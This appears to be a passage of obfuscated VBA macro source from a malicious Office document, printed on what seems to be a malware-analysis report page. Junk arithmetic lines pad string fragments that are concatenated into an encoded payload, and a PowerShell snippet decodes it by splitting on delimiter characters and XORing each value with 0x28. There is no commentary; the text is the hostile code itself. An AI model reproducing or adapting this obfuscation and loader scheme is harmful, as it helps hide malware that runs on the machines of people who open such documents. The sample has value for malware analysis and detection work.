pjBhDR = CDbl(okbrj * CDbl(uYiTt + Int(tFsUoi * Rnd(87502)) * MTdGuQ * Log(69008 * OjiJTw - mXKDW + Fix(51))))
uhGKJ = Tan(73465)
zBniD = PZECf
wLMCKm = CDbl(VGVwTb)
uiQNlA = Tan(82748)
KBkja = DGwiaX
JuhoGXYBti = "X77b69" + "W88_8D3D8W15W" + "116j15_8b3}" + "8m12X70D70m7" + "3_65j75X12" + "2b8m" + "3S8j15m6b77"
JjfWbi = CDbl(jqOicm * CDbl(ZjjZL + Int(iBHhEk * Rnd(87660)) * VauQqc * Log(25834 * GBUCoN - nlEMQ + Fix(51))))
wwcCuP = Tan(14067)
wCUjzj = hfCNj
wSrpzN = CDbl(TSlKC)
SmXvl = Tan(57756)
ciFIBR = TwAXcN
CIjEbXIq = "W80X77W15W1" + "9S78W71j90}77" + ">73}75}64X0W12" + "D9" + "7>121X98W120X" + "90D125W8_65" + "D70X8b1"
VOWutw = CDbl(IBSTM * CDbl(pmBFoz + Int(lUzcuJ * Rnd(34707)) * AdhUO * Log(51807 * PwTDO - wGRJBH + Fix(51))))
FSNdF = Tan(35021)
IjdNr = sTSSCO
BPuzj = CDbl(MIYkww)
dSNwN = Tan(11773)
nXFml = DnNiSt
dwZvNdjrvC = "2W99S78b88" + "X90_1" + "12" + "}1D83}9" + "2}90D81}83W" + "12>99}70W12"
WiNbsX = CDbl(OnhbG * CDbl(XRaHhj + Int(jlXDS * Rnd(34356)) * XzfBIq * Log(5377 * MUpLsh - OSaNm + Fix(51))))
OPazb = Tan(646)
ZBzBTT = fqijKC
kLJIa = CDbl(qQHfS)
IvhQD = Tan(30136)
ilEGS = qUXXE
AIbYLZDX = "6S66>92D1" + "21S" + "6S108S7" + "1X95j70j68" + "m71j" + "73m76m110W"
IaKJHd = CDbl(fsMGhC * CDbl(jhjCdl + Int(riDwl * Rnd(70908)) * ddQRU * Log(16683 * OwYzZ - Ktpudi + Fix(51))))
lKLEJV = Tan(45045)
qmCBKh = VruHmH
rHNWs = CDbl(BPwoM)
FfoJhF = Tan(4897)
XViLFD = OwsISG
ZmhbCaBpTr = "65>68D77}0" + ">12j97W121}98b1" + "20D90>125" + "W6W124m" + "71>" + "123" + "j92m90W" + "65m70X79_0j1>4" + "b8D"
QbAzG = CDbl(ISwwuP * CDbl(jizkjN + Int(QwrAi * Rnd(43807)) * FTwBB * Log(42079 * SrSMBS - pXsQLj + Fix(51))))
bhJaD = Tan(54971)
WrLaj = JitGRl
SkAVj = CDbl(CwAws)
jTSLIz = Tan(71638)
VNqfYi = fbbwjS
coPvkJWmtID = "12j111j95D78>1" + "27W109S78m1S1" + "9S12" + "3X92" + "_73D90D92>5D120"
kClvJw = CDbl(rmQCvN * CDbl(MLUvA + Int(NiNhLw * Rnd(10367)) * DCLBZW * Log(88353 * DjowAI - BoWiC + Fix(51))))
MacRTY = Tan(3847)
AHRqSw = qXvXRO
EkLrpn = CDbl(EBWqdc)
Jimpbz = Tan(87108)
oGDuF = LspPC
fuXSrNmVb = "S90_71" + "m75D7" + "7>9" + "1}91W8D12j11" + "1m95D78b127S109" + "S78}19S74X"
BEmVN = CDbl(TodLu * CDbl(oiwHVR + Int(slhIs * Rnd(58319)) * jkcPFp * Log(47104 * GmpNVj - DRnBhQ + Fix(51))))
YiaViw = Tan(74474)
uzwcEK = lwmzr
wtrOp = CDbl(MNGFXK)
rbijF = Tan(96588)
JRIvkN = PVrzjH
UBZvjqwdwW = "90b77_7" + "3W67j19_85>75}" + "73m92D75D64_" + "83m95>90m" + "65m92b77D5S64" + "S71D91m92" + "_8W" + "12}119S6S109b8" + "0b75}77X88S" + "92>65"
lQiuYJF = MShzrHoiSlC + JuhoGXYBti + CIjEbXIq + dwZvNdjrvC + AIbYLZDX + ZmhbCaBpTr + coPvkJWmtID + fuXSrNmVb + UBZvjqwdwW
End Function
Function HmdLzj()
On Error Resume Next
MRZzk = CDbl(DbCuf * CDbl(XOYVzz + Int(pTVno * Rnd(87314)) * qLnvn * Log(56442 * zlXLI - njOtbc + Fix(51))))
YdfLw = Tan(24671)
qwVHrv = EhvKFA
KuqikE = CDbl(NsnGH)
wokGZ = Tan(83852)
ZZcBJ = IfGFbL
rWvwZ = ">71}70S6" + "D10" + "1>77D91D91" + "W7" + "3_79m77j19" + ">85S85'.SPLI" + "t( " + "'WbSDmX}"
akwAd = CDbl(GEHDp * CDbl(TZUZA + Int(LHjLc * Rnd(44394)) * JjlmGP * Log(57523 * rlwvMC - tVitN + Fix(51))))
ZBjwYi = Tan(30406)
qzCusa = VZqbn
nPHbTU = CDbl(URAoL)
jtNfb = Tan(98878)
bnVioK = NKcjJB
GNTowo = "j_>')|%{ [cH" + "aR] ( $_ -bXOr" + " " + Chr(34) + "0x28" + Chr(34) + " " + ")} ) )"
HmdLzj = rWvwZ + GNTowo
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.